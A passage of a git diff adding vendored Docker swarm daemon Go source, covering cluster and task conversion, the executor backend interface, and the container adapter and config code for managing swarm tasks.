a/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go b/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go new file mode 100644 index 0000000000..606e00a69b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go @@ -0,0 +1,122 @@ +package convert + +import ( + "fmt" + "strings" + "time" + + types "github.com/docker/docker/api/types/swarm" + swarmapi "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/protobuf/ptypes" +) + +// SwarmFromGRPC converts a grpc Cluster to a Swarm. 
+func SwarmFromGRPC(c swarmapi.Cluster) types.Swarm { + swarm := types.Swarm{ + ClusterInfo: types.ClusterInfo{ + ID: c.ID, + Spec: types.Spec{ + Orchestration: types.OrchestrationConfig{ + TaskHistoryRetentionLimit: &c.Spec.Orchestration.TaskHistoryRetentionLimit, + }, + Raft: types.RaftConfig{ + SnapshotInterval: c.Spec.Raft.SnapshotInterval, + KeepOldSnapshots: &c.Spec.Raft.KeepOldSnapshots, + LogEntriesForSlowFollowers: c.Spec.Raft.LogEntriesForSlowFollowers, + HeartbeatTick: int(c.Spec.Raft.HeartbeatTick), + ElectionTick: int(c.Spec.Raft.ElectionTick), + }, + EncryptionConfig: types.EncryptionConfig{ + AutoLockManagers: c.Spec.EncryptionConfig.AutoLockManagers, + }, + }, + }, + JoinTokens: types.JoinTokens{ + Worker: c.RootCA.JoinTokens.Worker, + Manager: c.RootCA.JoinTokens.Manager, + }, + } + + heartbeatPeriod, _ := ptypes.Duration(c.Spec.Dispatcher.HeartbeatPeriod) + swarm.Spec.Dispatcher.HeartbeatPeriod = heartbeatPeriod + + swarm.Spec.CAConfig.NodeCertExpiry, _ = ptypes.Duration(c.Spec.CAConfig.NodeCertExpiry) + + for _, ca := range c.Spec.CAConfig.ExternalCAs { + swarm.Spec.CAConfig.ExternalCAs = append(swarm.Spec.CAConfig.ExternalCAs, &types.ExternalCA{ + Protocol: types.ExternalCAProtocol(strings.ToLower(ca.Protocol.String())), + URL: ca.URL, + Options: ca.Options, + }) + } + + // Meta + swarm.Version.Index = c.Meta.Version.Index + swarm.CreatedAt, _ = ptypes.Timestamp(c.Meta.CreatedAt) + swarm.UpdatedAt, _ = ptypes.Timestamp(c.Meta.UpdatedAt) + + // Annotations + swarm.Spec.Name = c.Spec.Annotations.Name + swarm.Spec.Labels = c.Spec.Annotations.Labels + + return swarm +} + +// SwarmSpecToGRPC converts a Spec to a grpc ClusterSpec. 
+func SwarmSpecToGRPC(s types.Spec) (swarmapi.ClusterSpec, error) { + return MergeSwarmSpecToGRPC(s, swarmapi.ClusterSpec{}) +} + +// MergeSwarmSpecToGRPC merges a Spec with an initial grpc ClusterSpec +func MergeSwarmSpecToGRPC(s types.Spec, spec swarmapi.ClusterSpec) (swarmapi.ClusterSpec, error) { + // We take the initSpec (either created from scratch, or returned by swarmkit), + // and will only change the value if the one taken from types.Spec is not nil or 0. + // In other words, if the value taken from types.Spec is nil or 0, we will maintain the status quo. + if s.Annotations.Name != "" { + spec.Annotations.Name = s.Annotations.Name + } + if len(s.Annotations.Labels) != 0 { + spec.Annotations.Labels = s.Annotations.Labels + } + + if s.Orchestration.TaskHistoryRetentionLimit != nil { + spec.Orchestration.TaskHistoryRetentionLimit = *s.Orchestration.TaskHistoryRetentionLimit + } + if s.Raft.SnapshotInterval != 0 { + spec.Raft.SnapshotInterval = s.Raft.SnapshotInterval + } + if s.Raft.KeepOldSnapshots != nil { + spec.Raft.KeepOldSnapshots = *s.Raft.KeepOldSnapshots + } + if s.Raft.LogEntriesForSlowFollowers != 0 { + spec.Raft.LogEntriesForSlowFollowers = s.Raft.LogEntriesForSlowFollowers + } + if s.Raft.HeartbeatTick != 0 { + spec.Raft.HeartbeatTick = uint32(s.Raft.HeartbeatTick) + } + if s.Raft.ElectionTick != 0 { + spec.Raft.ElectionTick = uint32(s.Raft.ElectionTick) + } + if s.Dispatcher.HeartbeatPeriod != 0 { + spec.Dispatcher.HeartbeatPeriod = ptypes.DurationProto(time.Duration(s.Dispatcher.HeartbeatPeriod)) + } + if s.CAConfig.NodeCertExpiry != 0 { + spec.CAConfig.NodeCertExpiry = ptypes.DurationProto(s.CAConfig.NodeCertExpiry) + } + + for _, ca := range s.CAConfig.ExternalCAs { + protocol, ok := swarmapi.ExternalCA_CAProtocol_value[strings.ToUpper(string(ca.Protocol))] + if !ok { + return swarmapi.ClusterSpec{}, fmt.Errorf("invalid protocol: %q", ca.Protocol) + } + spec.CAConfig.ExternalCAs = append(spec.CAConfig.ExternalCAs, &swarmapi.ExternalCA{ + 
Protocol: swarmapi.ExternalCA_CAProtocol(protocol), + URL: ca.URL, + Options: ca.Options, + }) + } + + spec.EncryptionConfig.AutoLockManagers = s.EncryptionConfig.AutoLockManagers + + return spec, nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/task.go b/vendor/github.com/docker/docker/daemon/cluster/convert/task.go new file mode 100644 index 0000000000..d0cf89c288 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/task.go @@ -0,0 +1,81 @@ +package convert + +import ( + "strings" + + types "github.com/docker/docker/api/types/swarm" + swarmapi "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/protobuf/ptypes" +) + +// TaskFromGRPC converts a grpc Task to a Task. +func TaskFromGRPC(t swarmapi.Task) types.Task { + if t.Spec.GetAttachment() != nil { + return types.Task{} + } + containerConfig := t.Spec.Runtime.(*swarmapi.TaskSpec_Container).Container + containerStatus := t.Status.GetContainer() + networks := make([]types.NetworkAttachmentConfig, 0, len(t.Spec.Networks)) + for _, n := range t.Spec.Networks { + networks = append(networks, types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + } + + task := types.Task{ + ID: t.ID, + Annotations: types.Annotations{ + Name: t.Annotations.Name, + Labels: t.Annotations.Labels, + }, + ServiceID: t.ServiceID, + Slot: int(t.Slot), + NodeID: t.NodeID, + Spec: types.TaskSpec{ + ContainerSpec: containerSpecFromGRPC(containerConfig), + Resources: resourcesFromGRPC(t.Spec.Resources), + RestartPolicy: restartPolicyFromGRPC(t.Spec.Restart), + Placement: placementFromGRPC(t.Spec.Placement), + LogDriver: driverFromGRPC(t.Spec.LogDriver), + Networks: networks, + }, + Status: types.TaskStatus{ + State: types.TaskState(strings.ToLower(t.Status.State.String())), + Message: t.Status.Message, + Err: t.Status.Err, + }, + DesiredState: types.TaskState(strings.ToLower(t.DesiredState.String())), + } + + // Meta + task.Version.Index = t.Meta.Version.Index + 
task.CreatedAt, _ = ptypes.Timestamp(t.Meta.CreatedAt) + task.UpdatedAt, _ = ptypes.Timestamp(t.Meta.UpdatedAt) + + task.Status.Timestamp, _ = ptypes.Timestamp(t.Status.Timestamp) + + if containerStatus != nil { + task.Status.ContainerStatus.ContainerID = containerStatus.ContainerID + task.Status.ContainerStatus.PID = int(containerStatus.PID) + task.Status.ContainerStatus.ExitCode = int(containerStatus.ExitCode) + } + + // NetworksAttachments + for _, na := range t.Networks { + task.NetworksAttachments = append(task.NetworksAttachments, networkAttachementFromGRPC(na)) + } + + if t.Status.PortStatus == nil { + return task + } + + for _, p := range t.Status.PortStatus.Ports { + task.Status.PortStatus.Ports = append(task.Status.PortStatus.Ports, types.PortConfig{ + Name: p.Name, + Protocol: types.PortConfigProtocol(strings.ToLower(swarmapi.PortConfig_Protocol_name[int32(p.Protocol)])), + PublishMode: types.PortConfigPublishMode(strings.ToLower(swarmapi.PortConfig_PublishMode_name[int32(p.PublishMode)])), + TargetPort: p.TargetPort, + PublishedPort: p.PublishedPort, + }) + } + + return task +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go b/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go new file mode 100644 index 0000000000..0f1da38558 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go @@ -0,0 +1,61 @@ +package executor + +import ( + "io" + "time" + + "github.com/docker/distribution" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/network" + swarmtypes "github.com/docker/docker/api/types/swarm" + clustertypes "github.com/docker/docker/daemon/cluster/provider" + "github.com/docker/docker/plugin" + "github.com/docker/docker/reference" + "github.com/docker/libnetwork" + 
"github.com/docker/libnetwork/cluster" + networktypes "github.com/docker/libnetwork/types" + "github.com/docker/swarmkit/agent/exec" + "golang.org/x/net/context" +) + +// Backend defines the executor component for a swarm agent. +type Backend interface { + CreateManagedNetwork(clustertypes.NetworkCreateRequest) error + DeleteManagedNetwork(name string) error + FindNetwork(idName string) (libnetwork.Network, error) + SetupIngress(req clustertypes.NetworkCreateRequest, nodeIP string) error + PullImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error + CreateManagedContainer(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error) + ContainerStart(name string, hostConfig *container.HostConfig, checkpoint string, checkpointDir string) error + ContainerStop(name string, seconds *int) error + ContainerLogs(context.Context, string, *backend.ContainerLogsConfig, chan struct{}) error + ConnectContainerToNetwork(containerName, networkName string, endpointConfig *network.EndpointSettings) error + ActivateContainerServiceBinding(containerName string) error + DeactivateContainerServiceBinding(containerName string) error + UpdateContainerServiceConfig(containerName string, serviceConfig *clustertypes.ServiceConfig) error + ContainerInspectCurrent(name string, size bool) (*types.ContainerJSON, error) + ContainerWaitWithContext(ctx context.Context, name string) error + ContainerRm(name string, config *types.ContainerRmConfig) error + ContainerKill(name string, sig uint64) error + SetContainerSecretStore(name string, store exec.SecretGetter) error + SetContainerSecretReferences(name string, refs []*swarmtypes.SecretReference) error + SystemInfo() (*types.Info, error) + VolumeCreate(name, driverName string, opts, labels map[string]string) (*types.Volume, error) + Containers(config *types.ContainerListOptions) ([]*types.Container, error) + 
SetNetworkBootstrapKeys([]*networktypes.EncryptionKey) error + DaemonJoinsCluster(provider cluster.Provider) + DaemonLeavesCluster() + IsSwarmCompatible() error + SubscribeToEvents(since, until time.Time, filter filters.Args) ([]events.Message, chan interface{}) + UnsubscribeFromEvents(listener chan interface{}) + UpdateAttachment(string, string, string, *network.NetworkingConfig) error + WaitForDetachment(context.Context, string, string, string, string) error + GetRepository(context.Context, reference.NamedTagged, *types.AuthConfig) (distribution.Repository, bool, error) + LookupImage(name string) (*types.ImageInspect, error) + PluginManager() *plugin.Manager + PluginGetter() *plugin.Store +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go new file mode 100644 index 0000000000..f82f8b54d3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go @@ -0,0 +1,463 @@ +package container + +import ( + "encoding/base64" + "encoding/json" + "fmt" + "io" + "os" + "strings" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/daemon/cluster/convert" + executorpkg "github.com/docker/docker/daemon/cluster/executor" + "github.com/docker/docker/reference" + "github.com/docker/libnetwork" + "github.com/docker/swarmkit/agent/exec" + "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/log" + "github.com/docker/swarmkit/protobuf/ptypes" + "golang.org/x/net/context" + "golang.org/x/time/rate" +) + +// containerAdapter conducts remote operations for a container. 
All calls +// are mostly naked calls to the client API, seeded with information from +// containerConfig. +type containerAdapter struct { + backend executorpkg.Backend + container *containerConfig + secrets exec.SecretGetter +} + +func newContainerAdapter(b executorpkg.Backend, task *api.Task, secrets exec.SecretGetter) (*containerAdapter, error) { + ctnr, err := newContainerConfig(task) + if err != nil { + return nil, err + } + + return &containerAdapter{ + container: ctnr, + backend: b, + secrets: secrets, + }, nil +} + +func (c *containerAdapter) pullImage(ctx context.Context) error { + spec := c.container.spec() + + // Skip pulling if the image is referenced by image ID. + if _, err := digest.ParseDigest(spec.Image); err == nil { + return nil + } + + // Skip pulling if the image is referenced by digest and already + // exists locally. + named, err := reference.ParseNamed(spec.Image) + if err == nil { + if _, ok := named.(reference.Canonical); ok { + _, err := c.backend.LookupImage(spec.Image) + if err == nil { + return nil + } + } + } + + // if the image needs to be pulled, the auth config will be retrieved and updated + var encodedAuthConfig string + if spec.PullOptions != nil { + encodedAuthConfig = spec.PullOptions.RegistryAuth + } + + authConfig := &types.AuthConfig{} + if encodedAuthConfig != "" { + if err := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, strings.NewReader(encodedAuthConfig))).Decode(authConfig); err != nil { + logrus.Warnf("invalid authconfig: %v", err) + } + } + + pr, pw := io.Pipe() + metaHeaders := map[string][]string{} + go func() { + err := c.backend.PullImage(ctx, c.container.image(), "", metaHeaders, authConfig, pw) + pw.CloseWithError(err) + }() + + dec := json.NewDecoder(pr) + dec.UseNumber() + m := map[string]interface{}{} + spamLimiter := rate.NewLimiter(rate.Every(time.Second), 1) + + lastStatus := "" + for { + if err := dec.Decode(&m); err != nil { + if err == io.EOF { + break + } + return err + } + l := log.G(ctx) + 
// limit pull progress logs unless the status changes + if spamLimiter.Allow() || lastStatus != m["status"] { + // if we have progress details, we have everything we need + if progress, ok := m["progressDetail"].(map[string]interface{}); ok { + // first, log the image and status + l = l.WithFields(logrus.Fields{ + "image": c.container.image(), + "status": m["status"], + }) + // then, if we have progress, log the progress + if progress["current"] != nil && progress["total"] != nil { + l = l.WithFields(logrus.Fields{ + "current": progress["current"], + "total": progress["total"], + }) + } + } + l.Debug("pull in progress") + } + // sometimes, we get no useful information at all, and add no fields + if status, ok := m["status"].(string); ok { + lastStatus = status + } + } + + // if the final stream object contained an error, return it + if errMsg, ok := m["error"]; ok { + return fmt.Errorf("%v", errMsg) + } + return nil +} + +func (c *containerAdapter) createNetworks(ctx context.Context) error { + for _, network := range c.container.networks() { + ncr, err := c.container.networkCreateRequest(network) + if err != nil { + return err + } + + if err := c.backend.CreateManagedNetwork(ncr); err != nil { // todo name missing + if _, ok := err.(libnetwork.NetworkNameError); ok { + continue + } + + return err + } + } + + return nil +} + +func (c *containerAdapter) removeNetworks(ctx context.Context) error { + for _, nid := range c.container.networks() { + if err := c.backend.DeleteManagedNetwork(nid); err != nil { + switch err.(type) { + case *libnetwork.ActiveEndpointsError: + continue + case libnetwork.ErrNoSuchNetwork: + continue + default: + log.G(ctx).Errorf("network %s remove failed: %v", nid, err) + return err + } + } + } + + return nil +} + +func (c *containerAdapter) networkAttach(ctx context.Context) error { + config := c.container.createNetworkingConfig() + + var ( + networkName string + networkID string + ) + + if config != nil { + for n, epConfig := range 
config.EndpointsConfig { + networkName = n + networkID = epConfig.NetworkID + break + } + } + + return c.backend.UpdateAttachment(networkName, networkID, c.container.id(), config) +} + +func (c *containerAdapter) waitForDetach(ctx context.Context) error { + config := c.container.createNetworkingConfig() + + var ( + networkName string + networkID string + ) + + if config != nil { + for n, epConfig := range config.EndpointsConfig { + networkName = n + networkID = epConfig.NetworkID + break + } + } + + return c.backend.WaitForDetachment(ctx, networkName, networkID, c.container.taskID(), c.container.id()) +} + +func (c *containerAdapter) create(ctx context.Context) error { + var cr containertypes.ContainerCreateCreatedBody + var err error + + if cr, err = c.backend.CreateManagedContainer(types.ContainerCreateConfig{ + Name: c.container.name(), + Config: c.container.config(), + HostConfig: c.container.hostConfig(), + // Use the first network in container create + NetworkingConfig: c.container.createNetworkingConfig(), + }); err != nil { + return err + } + + // Docker daemon currently doesn't support multiple networks in container create + // Connect to all other networks + nc := c.container.connectNetworkingConfig() + + if nc != nil { + for n, ep := range nc.EndpointsConfig { + if err := c.backend.ConnectContainerToNetwork(cr.ID, n, ep); err != nil { + return err + } + } + } + + container := c.container.task.Spec.GetContainer() + if container == nil { + return fmt.Errorf("unable to get container from task spec") + } + + // configure secrets + if err := c.backend.SetContainerSecretStore(cr.ID, c.secrets); err != nil { + return err + } + + refs := convert.SecretReferencesFromGRPC(container.Secrets) + if err := c.backend.SetContainerSecretReferences(cr.ID, refs); err != nil { + return err + } + + if err := c.backend.UpdateContainerServiceConfig(cr.ID, c.container.serviceConfig()); err != nil { + return err + } + + return nil +} + +// checkMounts ensures that the provided 
mounts won't have any host-specific +// problems at start up. For example, we disallow bind mounts without an +// existing path, which slightly different from the container API. +func (c *containerAdapter) checkMounts() error { + spec := c.container.spec() + for _, mount := range spec.Mounts { + switch mount.Type { + case api.MountTypeBind: + if _, err := os.Stat(mount.Source); os.IsNotExist(err) { + return fmt.Errorf("invalid bind mount source, source path not found: %s", mount.Source) + } + } + } + + return nil +} + +func (c *containerAdapter) start(ctx context.Context) error { + if err := c.checkMounts(); err != nil { + return err + } + + return c.backend.ContainerStart(c.container.name(), nil, "", "") +} + +func (c *containerAdapter) inspect(ctx context.Context) (types.ContainerJSON, error) { + cs, err := c.backend.ContainerInspectCurrent(c.container.name(), false) + if ctx.Err() != nil { + return types.ContainerJSON{}, ctx.Err() + } + if err != nil { + return types.ContainerJSON{}, err + } + return *cs, nil +} + +// events issues a call to the events API and returns a channel with all +// events. The stream of events can be shutdown by cancelling the context. 
+func (c *containerAdapter) events(ctx context.Context) <-chan events.Message { + log.G(ctx).Debugf("waiting on events") + buffer, l := c.backend.SubscribeToEvents(time.Time{}, time.Time{}, c.container.eventFilter()) + eventsq := make(chan events.Message, len(buffer)) + + for _, event := range buffer { + eventsq <- event + } + + go func() { + defer c.backend.UnsubscribeFromEvents(l) + + for { + select { + case ev := <-l: + jev, ok := ev.(events.Message) + if !ok { + log.G(ctx).Warnf("unexpected event message: %q", ev) + continue + } + select { + case eventsq <- jev: + case <-ctx.Done(): + return + } + case <-ctx.Done(): + return + } + } + }() + + return eventsq +} + +func (c *containerAdapter) wait(ctx context.Context) error { + return c.backend.ContainerWaitWithContext(ctx, c.container.nameOrID()) +} + +func (c *containerAdapter) shutdown(ctx context.Context) error { + // Default stop grace period to nil (daemon will use the stopTimeout of the container) + var stopgrace *int + spec := c.container.spec() + if spec.StopGracePeriod != nil { + stopgraceValue := int(spec.StopGracePeriod.Seconds) + stopgrace = &stopgraceValue + } + return c.backend.ContainerStop(c.container.name(), stopgrace) +} + +func (c *containerAdapter) terminate(ctx context.Context) error { + return c.backend.ContainerKill(c.container.name(), uint64(syscall.SIGKILL)) +} + +func (c *containerAdapter) remove(ctx context.Context) error { + return c.backend.ContainerRm(c.container.name(), &types.ContainerRmConfig{ + RemoveVolume: true, + ForceRemove: true, + }) +} + +func (c *containerAdapter) createVolumes(ctx context.Context) error { + // Create plugin volumes that are embedded inside a Mount + for _, mount := range c.container.task.Spec.GetContainer().Mounts { + if mount.Type != api.MountTypeVolume { + continue + } + + if mount.VolumeOptions == nil { + continue + } + + if mount.VolumeOptions.DriverConfig == nil { + continue + } + + req := c.container.volumeCreateRequest(&mount) + + // Check if this 
volume exists on the engine + if _, err := c.backend.VolumeCreate(req.Name, req.Driver, req.DriverOpts, req.Labels); err != nil { + // TODO(amitshukla): Today, volume create through the engine api does not return an error + // when the named volume with the same parameters already exists. + // It returns an error if the driver name is different - that is a valid error + return err + } + + } + + return nil +} + +func (c *containerAdapter) activateServiceBinding() error { + return c.backend.ActivateContainerServiceBinding(c.container.name()) +} + +func (c *containerAdapter) deactivateServiceBinding() error { + return c.backend.DeactivateContainerServiceBinding(c.container.name()) +} + +func (c *containerAdapter) logs(ctx context.Context, options api.LogSubscriptionOptions) (io.ReadCloser, error) { + reader, writer := io.Pipe() + + apiOptions := &backend.ContainerLogsConfig{ + ContainerLogsOptions: types.ContainerLogsOptions{ + Follow: options.Follow, + + // TODO(stevvooe): Parse timestamp out of message. This + // absolutely needs to be done before going to production with + // this, at it is completely redundant. + Timestamps: true, + Details: false, // no clue what to do with this, let's just deprecate it. + }, + OutStream: writer, + } + + if options.Since != nil { + since, err := ptypes.Timestamp(options.Since) + if err != nil { + return nil, err + } + apiOptions.Since = since.Format(time.RFC3339Nano) + } + + if options.Tail < 0 { + // See protobuf documentation for details of how this works. 
+ apiOptions.Tail = fmt.Sprint(-options.Tail - 1) + } else if options.Tail > 0 { + return nil, fmt.Errorf("tail relative to start of logs not supported via docker API") + } + + if len(options.Streams) == 0 { + // empty == all + apiOptions.ShowStdout, apiOptions.ShowStderr = true, true + } else { + for _, stream := range options.Streams { + switch stream { + case api.LogStreamStdout: + apiOptions.ShowStdout = true + case api.LogStreamStderr: + apiOptions.ShowStderr = true + } + } + } + + chStarted := make(chan struct{}) + go func() { + defer writer.Close() + c.backend.ContainerLogs(ctx, c.container.name(), apiOptions, chStarted) + }() + + return reader, nil +} + +// todo: typed/wrapped errors +func isContainerCreateNameConflict(err error) bool { + return strings.Contains(err.Error(), "Conflict. The name") +} + +func isUnknownContainer(err error) bool { + return strings.Contains(err.Error(), "No such container:") +} + +func isStoppedContainer(err error) bool { + return strings.Contains(err.Error(), "is already stopped") +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go new file mode 100644 index 0000000000..e0ee81a8b9 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go @@ -0,0 +1,81 @@ +package container + +import ( + executorpkg "github.com/docker/docker/daemon/cluster/executor" + "github.com/docker/swarmkit/agent/exec" + "github.com/docker/swarmkit/api" + "golang.org/x/net/context" +) + +// networkAttacherController implements agent.Controller against docker's API. +// +// networkAttacherController manages the lifecycle of network +// attachment of a docker unmanaged container managed as a task from +// agent point of view. It provides network attachment information to +// the unmanaged container for it to attach to the network and run. 
+type networkAttacherController struct { + backend executorpkg.Backend + task *api.Task + adapter *containerAdapter + closed chan struct{} +} + +func newNetworkAttacherController(b executorpkg.Backend, task *api.Task, secrets exec.SecretGetter) (*networkAttacherController, error) { + adapter, err := newContainerAdapter(b, task, secrets) + if err != nil { + return nil, err + } + + return &networkAttacherController{ + backend: b, + task: task, + adapter: adapter, + closed: make(chan struct{}), + }, nil +} + +func (nc *networkAttacherController) Update(ctx context.Context, t *api.Task) error { + return nil +} + +func (nc *networkAttacherController) Prepare(ctx context.Context) error { + // Make sure all the networks that the task needs are created. + if err := nc.adapter.createNetworks(ctx); err != nil { + return err + } + + return nil +} + +func (nc *networkAttacherController) Start(ctx context.Context) error { + return nc.adapter.networkAttach(ctx) +} + +func (nc *networkAttacherController) Wait(pctx context.Context) error { + ctx, cancel := context.WithCancel(pctx) + defer cancel() + + return nc.adapter.waitForDetach(ctx) +} + +func (nc *networkAttacherController) Shutdown(ctx context.Context) error { + return nil +} + +func (nc *networkAttacherController) Terminate(ctx context.Context) error { + return nil +} + +func (nc *networkAttacherController) Remove(ctx context.Context) error { + // Try removing the network referenced in this task in case this + // task is the last one referencing it + if err := nc.adapter.removeNetworks(ctx); err != nil { + return err + } + + return nil +} + +func (nc *networkAttacherController) Close() error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go new file mode 100644 index 0000000000..f033ad545e --- /dev/null +++ 
b/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go @@ -0,0 +1,598 @@ +package container + +import ( + "errors" + "fmt" + "net" + "strconv" + "strings" + "time" + + "github.com/Sirupsen/logrus" + + "github.com/docker/docker/api/types" + enginecontainer "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + enginemount "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/network" + volumetypes "github.com/docker/docker/api/types/volume" + clustertypes "github.com/docker/docker/daemon/cluster/provider" + "github.com/docker/docker/reference" + "github.com/docker/go-connections/nat" + "github.com/docker/swarmkit/agent/exec" + "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/protobuf/ptypes" + "github.com/docker/swarmkit/template" +) + +const ( + // Explicitly use the kernel's default setting for CPU quota of 100ms. + // https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt + cpuQuotaPeriod = 100 * time.Millisecond + + // systemLabelPrefix represents the reserved namespace for system labels. + systemLabelPrefix = "com.docker.swarm" +) + +// containerConfig converts task properties into docker container compatible +// components. +type containerConfig struct { + task *api.Task + networksAttachments map[string]*api.NetworkAttachment +} + +// newContainerConfig returns a validated container config. No methods should +// return an error if this function returns without error. 
+func newContainerConfig(t *api.Task) (*containerConfig, error) { + var c containerConfig + return &c, c.setTask(t) +} + +func (c *containerConfig) setTask(t *api.Task) error { + if t.Spec.GetContainer() == nil && t.Spec.GetAttachment() == nil { + return exec.ErrRuntimeUnsupported + } + + container := t.Spec.GetContainer() + if container != nil { + if container.Image == "" { + return ErrImageRequired + } + + if err := validateMounts(container.Mounts); err != nil { + return err + } + } + + // index the networks by name + c.networksAttachments = make(map[string]*api.NetworkAttachment, len(t.Networks)) + for _, attachment := range t.Networks { + c.networksAttachments[attachment.Network.Spec.Annotations.Name] = attachment + } + + c.task = t + + if t.Spec.GetContainer() != nil { + preparedSpec, err := template.ExpandContainerSpec(t) + if err != nil { + return err + } + c.task.Spec.Runtime = &api.TaskSpec_Container{ + Container: preparedSpec, + } + } + + return nil +} + +func (c *containerConfig) id() string { + attachment := c.task.Spec.GetAttachment() + if attachment == nil { + return "" + } + + return attachment.ContainerID +} + +func (c *containerConfig) taskID() string { + return c.task.ID +} + +func (c *containerConfig) endpoint() *api.Endpoint { + return c.task.Endpoint +} + +func (c *containerConfig) spec() *api.ContainerSpec { + return c.task.Spec.GetContainer() +} + +func (c *containerConfig) nameOrID() string { + if c.task.Spec.GetContainer() != nil { + return c.name() + } + + return c.id() +} + +func (c *containerConfig) name() string { + if c.task.Annotations.Name != "" { + // if set, use the container Annotations.Name field, set in the orchestrator. + return c.task.Annotations.Name + } + + slot := fmt.Sprint(c.task.Slot) + if slot == "" || c.task.Slot == 0 { + slot = c.task.NodeID + } + + // fallback to service.slot.id. 
+ return fmt.Sprintf("%s.%s.%s", c.task.ServiceAnnotations.Name, slot, c.task.ID) +} + +func (c *containerConfig) image() string { + raw := c.spec().Image + ref, err := reference.ParseNamed(raw) + if err != nil { + return raw + } + return reference.WithDefaultTag(ref).String() +} + +func (c *containerConfig) portBindings() nat.PortMap { + portBindings := nat.PortMap{} + if c.task.Endpoint == nil { + return portBindings + } + + for _, portConfig := range c.task.Endpoint.Ports { + if portConfig.PublishMode != api.PublishModeHost { + continue + } + + port := nat.Port(fmt.Sprintf("%d/%s", portConfig.TargetPort, strings.ToLower(portConfig.Protocol.String()))) + binding := []nat.PortBinding{ + {}, + } + + if portConfig.PublishedPort != 0 { + binding[0].HostPort = strconv.Itoa(int(portConfig.PublishedPort)) + } + portBindings[port] = binding + } + + return portBindings +} + +func (c *containerConfig) exposedPorts() map[nat.Port]struct{} { + exposedPorts := make(map[nat.Port]struct{}) + if c.task.Endpoint == nil { + return exposedPorts + } + + for _, portConfig := range c.task.Endpoint.Ports { + if portConfig.PublishMode != api.PublishModeHost { + continue + } + + port := nat.Port(fmt.Sprintf("%d/%s", portConfig.TargetPort, strings.ToLower(portConfig.Protocol.String()))) + exposedPorts[port] = struct{}{} + } + + return exposedPorts +} + +func (c *containerConfig) config() *enginecontainer.Config { + config := &enginecontainer.Config{ + Labels: c.labels(), + Tty: c.spec().TTY, + OpenStdin: c.spec().OpenStdin, + User: c.spec().User, + Env: c.spec().Env, + Hostname: c.spec().Hostname, + WorkingDir: c.spec().Dir, + Image: c.image(), + ExposedPorts: c.exposedPorts(), + Healthcheck: c.healthcheck(), + } + + if len(c.spec().Command) > 0 { + // If Command is provided, we replace the whole invocation with Command + // by replacing Entrypoint and specifying Cmd. Args is ignored in this + // case. + config.Entrypoint = append(config.Entrypoint, c.spec().Command...) 
+ config.Cmd = append(config.Cmd, c.spec().Args...) + } else if len(c.spec().Args) > 0 { + // In this case, we assume the image has an Entrypoint and Args + // specifies the arguments for that entrypoint. + config.Cmd = c.spec().Args + } + + return config +} + +func (c *containerConfig) labels() map[string]string { + var ( + system = map[string]string{ + "task": "", // mark as cluster task + "task.id": c.task.ID, + "task.name": c.name(), + "node.id": c.task.NodeID, + "service.id": c.task.ServiceID, + "service.name": c.task.ServiceAnnotations.Name, + } + labels = make(map[string]string) + ) + + // base labels are those defined in the spec. + for k, v := range c.spec().Labels { + labels[k] = v + } + + // we then apply the overrides from the task, which may be set via the + // orchestrator. + for k, v := range c.task.Annotations.Labels { + labels[k] = v + } + + // finally, we apply the system labels, which override all labels. + for k, v := range system { + labels[strings.Join([]string{systemLabelPrefix, k}, ".")] = v + } + + return labels +} + +func (c *containerConfig) mounts() []enginemount.Mount { + var r []enginemount.Mount + for _, mount := range c.spec().Mounts { + r = append(r, convertMount(mount)) + } + return r +} + +func convertMount(m api.Mount) enginemount.Mount { + mount := enginemount.Mount{ + Source: m.Source, + Target: m.Target, + ReadOnly: m.ReadOnly, + } + + switch m.Type { + case api.MountTypeBind: + mount.Type = enginemount.TypeBind + case api.MountTypeVolume: + mount.Type = enginemount.TypeVolume + case api.MountTypeTmpfs: + mount.Type = enginemount.TypeTmpfs + } + + if m.BindOptions != nil { + mount.BindOptions = &enginemount.BindOptions{} + switch m.BindOptions.Propagation { + case api.MountPropagationRPrivate: + mount.BindOptions.Propagation = enginemount.PropagationRPrivate + case api.MountPropagationPrivate: + mount.BindOptions.Propagation = enginemount.PropagationPrivate + case api.MountPropagationRSlave: + mount.BindOptions.Propagation = 
